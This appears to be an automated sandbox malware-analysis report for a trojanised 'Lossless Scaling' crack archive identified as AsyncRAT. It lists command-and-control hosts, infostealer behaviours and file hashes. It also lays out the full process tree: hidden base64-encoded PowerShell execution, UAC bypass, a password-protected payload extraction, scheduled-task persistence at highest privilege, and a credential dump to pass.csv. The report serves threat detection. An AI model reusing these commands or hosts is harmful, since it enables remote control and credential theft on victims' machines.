Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    137s
  • max time network
    146s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250217-en
  • resource tags

    arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    12/03/2025, 10:05

General

  • Target

    lossless scaling.zip

  • Size

    5.5MB

  • MD5

    7cad413146081f6315d82b1dfbebc256

  • SHA1

    5ef84bec1e3b9d5c62a95b08ac133991a1951bf4

  • SHA256

    653c00ae23b0d0001ab2d962daef99c15dbc83b3c676b9f79249ebd757c78d2e

  • SHA512

    e82b5caf11830d2dfef2b8d8c3a5eed116e68ed3f9b4259953155f8474e682bb56b3b7d9e64d8e07b4acf5c22540eb3620a3199e79c161c0eb705ea11179ae74

  • SSDEEP

    98304:Uyf2ZCmbGVSS7jQ3TyQfVp2EhpyZ6DVvpnPqf7waG159wwo2QOWIAeukWahTDCQM:/mUSS7M3TyQfzyZ0dtdm2QbIAeqa5mr5

Malware Config

Extracted

Family

asyncrat

Version

A 14

Botnet

Default

C2

puka1.work.gd:408

puka1.ddnsfree.com:408

ramdan.mywire.org:408

Mutex

MaterxMutex_Egypt408

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • UAC bypass 3 TTPs 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

    Run Powershell and hide display window.

  • Executes dropped EXE 9 IoCs
  • Loads dropped DLL 50 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 3 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 4 IoCs
  • Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Control Panel 3 IoCs
  • Modifies registry class 4 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 19 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.exe
    C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\lossless scaling.zip"
    1⤵
      PID:3104
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:3876
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""E:\install + Crack.bat" "
        1⤵
        • Enumerates connected drives
        • Suspicious use of WriteProcessMemory
        PID:2808
        • C:\Windows\system32\net.exe
          net session
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1456
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 session
            3⤵
              PID:3428
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "$b='"cG93ZXJzaGVsbCAtRXhlY3V0aW9uUG9saWN5IEJ5cGFzcyAtRmlsZSBsYW5ndWFnZS93aW5feC5wczE="';Invoke-Expression([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b)))"
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3896
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File language/win_x.ps1
              3⤵
              • UAC bypass
              • Command and Scripting Interpreter: PowerShell
              • Drops file in Program Files directory
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1264
              • C:\Windows\system32\reg.exe
                "C:\Windows\system32\reg.exe" ADD HKCU\SOFTWARE\Valve\Steam\Apps\993090 /v Installed /t REG_DWORD /d 1 /f
                4⤵
                • Modifies registry key
                PID:876
              • C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe
                "C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe"
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Modifies Control Panel
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                PID:572
              • C:\Windows\system32\schtasks.exe
                "C:\Windows\system32\schtasks.exe" /query /tn administrator
                4⤵
                  PID:4360
                • C:\Windows\system32\schtasks.exe
                  "C:\Windows\system32\schtasks.exe" /query /tn Backup1
                  4⤵
                    PID:2900
                  • C:\Users\Public\IObitUnlocker\RAR.exe
                    "C:\Users\Public\IObitUnlocker\RAR.exe" x -pahmad..123 -o+ C:\Users\Public\IObitUnlocker\EN.dll C:\Users\Public\IObitUnlocker\
                    4⤵
                    • Executes dropped EXE
                    PID:5028
                  • C:\Windows\System32\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Public\IObitUnlocker\Loader.vbs"
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1468
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))
                      5⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:4464
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                        6⤵
                          PID:2296
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                          6⤵
                            PID:3732
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                            6⤵
                            • System Location Discovery: System Language Discovery
                            • Modifies registry class
                            • Suspicious behavior: AddClipboardFormatListener
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of SetWindowsHookEx
                            PID:2332
                            • C:\Windows\SysWOW64\WScript.exe
                              "C:\Windows\System32\WScript.exe" "C:\Users\Public\External\Components\11.vbs"
                              7⤵
                              • System Location Discovery: System Language Discovery
                              PID:2516
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c set __COMPAT_LAYER=RunAsInvoker && C:\Users\Public\External\Components\a.exe C:\Users\Public\pass.csv
                                8⤵
                                • Access Token Manipulation: Create Process with Token
                                • System Location Discovery: System Language Discovery
                                PID:4716
                                • C:\Users\Public\External\Components\a.exe
                                  C:\Users\Public\External\Components\a.exe C:\Users\Public\pass.csv
                                  9⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Accesses Microsoft Outlook accounts
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of SetWindowsHookEx
                                  PID:4756
                          • C:\Windows\system32\schtasks.exe
                            "C:\Windows\system32\schtasks.exe" /query /tn administrator
                            6⤵
                              PID:2712
                            • C:\Windows\system32\schtasks.exe
                              "C:\Windows\system32\schtasks.exe" /create /tn administrator /sc minute /mo 2 /tr C:\Users\Public\IObitUnlocker\Loader.vbs /rl HIGHEST
                              6⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:4480
                        • C:\Windows\System32\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Public\IObitUnlocker\Backup.vbs"
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1636
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))
                            5⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:4284
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                              6⤵
                              • System Location Discovery: System Language Discovery
                              PID:4264
                            • C:\Windows\system32\schtasks.exe
                              "C:\Windows\system32\schtasks.exe" /query /tn administrator
                              6⤵
                                PID:1872
                              • C:\Windows\system32\schtasks.exe
                                "C:\Windows\system32\schtasks.exe" /create /tn administrator /sc minute /mo 2 /tr C:\Users\Public\IObitUnlocker\Loader.vbs /rl HIGHEST
                                6⤵
                                • Scheduled Task/Job: Scheduled Task
                                PID:3508
                          • C:\Windows\system32\schtasks.exe
                            "C:\Windows\system32\schtasks.exe" /query /tn Backup1
                            4⤵
                              PID:3596
                            • C:\Windows\system32\schtasks.exe
                              "C:\Windows\system32\schtasks.exe" /create /tn administartor /SC minute /MO 2 /tr C:\Users\Public\IObitUnlocker\Loader.vbs /RL HIGHEST
                              4⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:1916
                            • C:\Windows\system32\Dism.exe
                              "C:\Windows\system32\Dism.exe" /Online /Enable-Feature /FeatureName:NetFx3
                              4⤵
                              • Drops file in Windows directory
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:396
                              • C:\Users\Admin\AppData\Local\Temp\B52360D2-7575-457F-A460-6E0975B83EA7\dismhost.exe
                                C:\Users\Admin\AppData\Local\Temp\B52360D2-7575-457F-A460-6E0975B83EA7\dismhost.exe {659D6ED2-DAB8-445B-8C83-A1379A68FEBA}
                                5⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Drops file in Windows directory
                                PID:4888
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""E:\Registration (Crack)\Crack.bat" "
                        1⤵
                        • Enumerates connected drives
                        • Suspicious use of WriteProcessMemory
                        PID:5004
                        • C:\Windows\system32\net.exe
                          net session
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2480
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 session
                            3⤵
                              PID:3316
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "$b='"cG93ZXJzaGVsbCAtRXhlY3V0aW9uUG9saWN5IEJ5cGFzcyAtRmlsZSBsYW5ndWFnZS93aW5feC5wczE="';Invoke-Expression([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b)))"
                            2⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:1176
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File language/win_x.ps1
                              3⤵
                              • UAC bypass
                              • Command and Scripting Interpreter: PowerShell
                              • Drops file in Program Files directory
                              • Modifies registry class
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:552
                              • C:\Windows\system32\reg.exe
                                "C:\Windows\system32\reg.exe" ADD HKCU\SOFTWARE\Valve\Steam\Apps\993090 /v Installed /t REG_DWORD /d 1 /f
                                4⤵
                                • Modifies registry key
                                PID:4904
                              • C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe
                                "C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe"
                                4⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Modifies Control Panel
                                • Suspicious use of SetWindowsHookEx
                                PID:328
                              • C:\Windows\system32\schtasks.exe
                                "C:\Windows\system32\schtasks.exe" /query /tn administrator
                                4⤵
                                  PID:4804
                                • C:\Windows\system32\schtasks.exe
                                  "C:\Windows\system32\schtasks.exe" /query /tn Backup1
                                  4⤵
                                    PID:3304
                                  • C:\Windows\system32\schtasks.exe
                                    "C:\Windows\system32\schtasks.exe" /create /tn Backup1 /sc minute /mo 30 /tr C:\Users\Public\IObitUnlocker\Backup.vbs /rl HIGHEST
                                    4⤵
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:1224
                                  • C:\Users\Public\IObitUnlocker\RAR.exe
                                    "C:\Users\Public\IObitUnlocker\RAR.exe" x -pahmad..123 -o+ C:\Users\Public\IObitUnlocker\EN.dll C:\Users\Public\IObitUnlocker\
                                    4⤵
                                    • Executes dropped EXE
                                    PID:1032
                                  • C:\Windows\System32\WScript.exe
                                    "C:\Windows\System32\WScript.exe" "C:\Users\Public\IObitUnlocker\Loader.vbs"
                                    4⤵
                                      PID:1148
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))
                                        5⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious use of SetThreadContext
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4620
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                          6⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:1560
                                        • C:\Windows\system32\schtasks.exe
                                          "C:\Windows\system32\schtasks.exe" /query /tn administrator
                                          6⤵
                                            PID:964
                                      • C:\Windows\System32\WScript.exe
                                        "C:\Windows\System32\WScript.exe" "C:\Users\Public\IObitUnlocker\Backup.vbs"
                                        4⤵
                                          PID:932
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))
                                            5⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious use of SetThreadContext
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3344
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                              6⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:4888
                                            • C:\Windows\system32\schtasks.exe
                                              "C:\Windows\system32\schtasks.exe" /query /tn administrator
                                              6⤵
                                                PID:4756
                                          • C:\Windows\system32\schtasks.exe
                                            "C:\Windows\system32\schtasks.exe" /query /tn Backup1
                                            4⤵
                                              PID:1224
                                            • C:\Windows\system32\Dism.exe
                                              "C:\Windows\system32\Dism.exe" /Online /Enable-Feature /FeatureName:NetFx3
                                              4⤵
                                              • Drops file in Windows directory
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3000
                                              • C:\Users\Admin\AppData\Local\Temp\413055A8-E512-4D32-8BBB-01BE37C66396\dismhost.exe
                                                C:\Users\Admin\AppData\Local\Temp\413055A8-E512-4D32-8BBB-01BE37C66396\dismhost.exe {568AB3C0-E476-4622-BD89-EEB9CB2F381E}
                                                5⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Drops file in Windows directory
                                                PID:1088
                                      • C:\Windows\regedit.exe
                                        "regedit.exe" "E:\Registration (Crack)\Double-click, confirm to merge, done.reg"
                                        1⤵
                                        • Runs .reg file with regedit
                                        PID:2812
                                      • \??\E:\lossless scaling.exe
                                        "E:\lossless scaling.exe"
                                        1⤵
                                        • Suspicious use of FindShellTrayWindow
                                        • Suspicious use of SendNotifyMessage
                                        PID:4264
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c ""E:\install + Crack.bat" "
                                        1⤵
                                        • Enumerates connected drives
                                        PID:4688
                                        • C:\Windows\system32\net.exe
                                          net session
                                          2⤵
                                            PID:1504
                                            • C:\Windows\system32\net1.exe
                                              C:\Windows\system32\net1 session
                                              3⤵
                                                PID:3624
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "$b='"cG93ZXJzaGVsbCAtRXhlY3V0aW9uUG9saWN5IEJ5cGFzcyAtRmlsZSBsYW5ndWFnZS93aW5feC5wczE="';Invoke-Expression([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b)))"
                                              2⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2484
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File language/win_x.ps1
                                                3⤵
                                                • UAC bypass
                                                • Command and Scripting Interpreter: PowerShell
                                                • Drops file in Program Files directory
                                                • Modifies registry class
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1964
                                                • C:\Windows\system32\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD HKCU\SOFTWARE\Valve\Steam\Apps\993090 /v Installed /t REG_DWORD /d 1 /f
                                                  4⤵
                                                  • Modifies registry key
                                                  PID:2464
                                                • C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe
                                                  "C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe"
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Modifies Control Panel
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:404
                                                • C:\Windows\system32\schtasks.exe
                                                  "C:\Windows\system32\schtasks.exe" /query /tn administrator
                                                  4⤵
                                                    PID:4496
                                                  • C:\Windows\system32\schtasks.exe
                                                    "C:\Windows\system32\schtasks.exe" /query /tn Backup1
                                                    4⤵
                                                      PID:396
                                                    • C:\Users\Public\IObitUnlocker\RAR.exe
                                                      "C:\Users\Public\IObitUnlocker\RAR.exe" x -pahmad..123 -o+ C:\Users\Public\IObitUnlocker\EN.dll C:\Users\Public\IObitUnlocker\
                                                      4⤵
                                                      • Executes dropped EXE
                                                      PID:5016
                                                    • C:\Windows\System32\WScript.exe
                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Public\IObitUnlocker\Loader.vbs"
                                                      4⤵
                                                        PID:3056
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))
                                                          5⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious use of SetThreadContext
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:4936
                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                            6⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:772
                                                          • C:\Windows\system32\schtasks.exe
                                                            "C:\Windows\system32\schtasks.exe" /query /tn administrator
                                                            6⤵
                                                              PID:404
                                                        • C:\Windows\System32\WScript.exe
                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Public\IObitUnlocker\Backup.vbs"
                                                          4⤵
                                                            PID:2056
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))
                                                              5⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious use of SetThreadContext
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2092
                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                                6⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:4360
                                                              • C:\Windows\system32\schtasks.exe
                                                                "C:\Windows\system32\schtasks.exe" /query /tn administrator
                                                                6⤵
                                                                  PID:3008
                                                            • C:\Windows\system32\schtasks.exe
                                                              "C:\Windows\system32\schtasks.exe" /query /tn Backup1
                                                              4⤵
                                                                PID:2244
                                                              • C:\Windows\system32\schtasks.exe
                                                                "C:\Windows\system32\schtasks.exe" /create /tn administartor /SC minute /MO 2 /tr C:\Users\Public\IObitUnlocker\Loader.vbs /RL HIGHEST
                                                                4⤵
                                                                • Scheduled Task/Job: Scheduled Task
                                                                PID:4856

                                                        Network

                                                        MITRE ATT&CK Enterprise v15

                                                        Replay Monitor

                                                        Loading Replay Monitor...

                                                        Downloads

                                                        • C:\Program Files (x86)\Lossless Scaling\Lan.vbs

                                                          Filesize

                                                          432B

                                                          MD5

                                                          49af07d132592c9a62eaaef421e3e589

                                                          SHA1

                                                          cb7cc0a4a492dba5773506e816467975cabdc227

                                                          SHA256

                                                          487985d63734cd4828eaf03284e0d1d2fa684afc2d46da489c99d498f31a83ab

                                                          SHA512

                                                          7525522f2b648aaf94e52fd1c1787931c11ca03e656ccbcca5879d6132d383aa40228256cbf93d0e7741f0003de6fe94ca537151a2162d33c077943b90fe5908

                                                        • C:\Program Files (x86)\Lossless Scaling\Licenses.txt

                                                          Filesize

                                                          16KB

                                                          MD5

                                                          f803d675b73460adf21f4fbc31d8d5d8

                                                          SHA1

                                                          e8c43c839b6ca5ce1185fd47187e1c59e2673faa

                                                          SHA256

                                                          2696aab3218d13e02ea6541f14f77cfc6412c4f065db04dafbe4ed11673931dd

                                                          SHA512

                                                          66e0b9e921e0f602b0c2ea3d55bd843dbe2a1e58fc24f1da0dec7d6803d3f249f8ee74df503bfc3e7adf15460a338b4099d1c07a218070099152dde6c319136b

                                                        • C:\Program Files (x86)\Lossless Scaling\Lossless.dll

                                                          Filesize

                                                          4.3MB

                                                          MD5

                                                          7969a2cbc4c31ccfb1ab8213f19501b9

                                                          SHA1

                                                          06a24af6e922ba2cd7fccb76ce2f43271a9af8b6

                                                          SHA256

                                                          486a48562504a274e984599a5931de200ea73bf6bc4c83bf6ca8daa651e80a68

                                                          SHA512

                                                          935988a39c1af479e971850f6758ee94098b35f173da609206312deeabeb3bc9466f93d1dad4e6d7938235f65fc52fdbd56058d46c1ba775d31718358eb6d8fa

                                                        • C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe

                                                          Filesize

                                                          953KB

                                                          MD5

                                                          2c98d33096e97094cbbbd19f27f40883

                                                          SHA1

                                                          7e28af9d119d2658f962e3b28140c6081be1612b

                                                          SHA256

                                                          010ac1120a88a772e87d9e9018aa5db034a9bac9399803d4a7c4db3c47a71df6

                                                          SHA512

                                                          f9070ad6b2e3295fdde13aa8d7486147a7f9a675a924ad3bf117479baf5b573cf92650199e58378dd8345a28ab890bbd5021d374030c24836bfa65bb037dddc7

                                                        • C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe.config

                                                          Filesize

                                                          174B

                                                          MD5

                                                          2a2df45a07478a1c77d5834c21f3d7fd

                                                          SHA1

                                                          f949e331f0d75ba38d33a072f74e2327c870d916

                                                          SHA256

                                                          051099983b896673909e01a1f631b6652abb88da95c9f06f3efef4be033091fa

                                                          SHA512

                                                          1a6dd48f92ea6b68ee23b86ba297cd1559f795946ecda17ade68aea3dda188869bba380e3ea3472e08993f4ae574c528b34c3e25503ee6119fd4f998835e09d7

                                                        • C:\Program Files (x86)\Lossless Scaling\ar\LosslessScaling.resources.dll

                                                          Filesize

                                                          24KB

                                                          MD5

                                                          ed6f1b887abd06c83ecb9c6ad4b6ddae

                                                          SHA1

                                                          595f4748ee9f088d6c87281ba822c2e023cea9f2

                                                          SHA256

                                                          e078d3fe1e5c3ef3ae5a22da414b33d29c3ae335397fd699a35f0b767e20ab29

                                                          SHA512

                                                          c16bb876c0c6bf5f016a476649c4f99aa7a8679fbc7d356f33d13b65667878369a8aeadd010f828650385ce7783226505219a3b6adba22e33cbf30bcb706fcd0

                                                        • C:\Program Files (x86)\Lossless Scaling\cs\LosslessScaling.resources.dll

                                                          Filesize

                                                          20KB

                                                          MD5

                                                          daa100df6e6711906b61c9ab5aa16032

                                                          SHA1

                                                          963ff6c2d517d188014d2ef3682c4797888e6d26

                                                          SHA256

                                                          cc61635da46b2c9974335ea37e0b5fd660a5c8a42a89b271fa7ec2ac4b8b26f6

                                                          SHA512

                                                          548faee346d6c5700bb37d3d44b593e3c343ca7dc6b564f6d3dc7bd5463fbb925765d9c6ea3065bf19f3ccf7b2e1cb5c34c908057c60b62be866d2566c0b9393

                                                        • C:\Program Files (x86)\Lossless Scaling\de\LosslessScaling.resources.dll

                                                          Filesize

                                                          18KB

                                                          MD5

                                                          bea43c84cdc466ddea1398d4026c3ef9

                                                          SHA1

                                                          737b176c58d870acb9383b11c8d553c064ec2aff

                                                          SHA256

                                                          7bdb17bfa2e73143efcd5bdaf089a2127c6175daf0ced23c9c4102011d09a89a

                                                          SHA512

                                                          b9bbf206baef969d3960e9fa56b7edc320351698f66893dfa42897a7350e4e9d575e8cc4205ae28f2b8946d0f7f48fa2a550a30e7454423ec9d3812f5cb026e3

                                                        • C:\Program Files (x86)\Lossless Scaling\fr\LosslessScaling.resources.dll

                                                          Filesize

                                                          21KB

                                                          MD5

                                                          29a5987145f5dcfd2963817c73b1e116

                                                          SHA1

                                                          bd046232e38f76b3ffcd4cb0b701e7e13b571192

                                                          SHA256

                                                          98aa85556c7b888bbe0ed12839fca9bd73c0f02ea1a93ae0985aadc157346a61

                                                          SHA512

                                                          cb27fc2771c481d774a4985e5911c26a877775db9f6b02b853584ddfeb70a39b929bfdccc7e63e65806974e3450c6dcaceab3db6766aee3de26466b9d5000c4b

                                                        • C:\Program Files (x86)\Lossless Scaling\he\LosslessScaling.resources.dll

                                                          Filesize

                                                          22KB

                                                          MD5

                                                          854559ce6f1a4172247402bcb7ba6d6f

                                                          SHA1

                                                          3d999b3f8d9125ac619d3029b49e5a185370578a

                                                          SHA256

                                                          4edec52a80b6f695343c617813b9d94260b1a31d02809d1055774da5ac4943a3

                                                          SHA512

                                                          7fa81a302da4b99fe7ad446893dc90da710fe918b9934642ee2a66323fabdec562b0eb1bfc21070df11a7eb040f74d961090bbf040b4c38c8b86c7917aa5ca99

                                                        • C:\Program Files (x86)\Lossless Scaling\hr\LosslessScaling.resources.dll

                                                          Filesize

                                                          19KB

                                                          MD5

                                                          ba84b335d4991ee1c52a6bf85e1a2fa5

                                                          SHA1

                                                          25e524a30249a930faa0932b3a2d1d52b4a75f61

                                                          SHA256

                                                          f0658c57595b27e93ffe8d797172eb9931e4f3407b9b9f0d1abda112d6921453

                                                          SHA512

                                                          c8e09e219e070ccc6c4de2c98849f88869149d44b358d23b533291ee56b70ca265f9b34846dea3674e62a17fae38755e99c704448437830d90c820a8185e2f1a

                                                        • C:\Program Files (x86)\Lossless Scaling\id\LosslessScaling.resources.dll

                                                          Filesize

                                                          19KB

                                                          MD5

                                                          e6198d50284fda094898d92cd867a2e5

                                                          SHA1

                                                          70c63146345ce060051ff66620fb8e64bbac19db

                                                          SHA256

                                                          c597b1b463b7cec49548fac00d7588c9652bb67cc2b1b0c88676bf8f1558571e

                                                          SHA512

                                                          82485d394fe06636933a9d5df895b38bfea1117307ea4c208e59177feb37db2bf19070dbaef3529f053fb2f13708c4648d9521fa31877e9c0f195138758ca256

                                                        • C:\Program Files (x86)\Lossless Scaling\it\LosslessScaling.resources.dll

                                                          Filesize

                                                          20KB

                                                          MD5

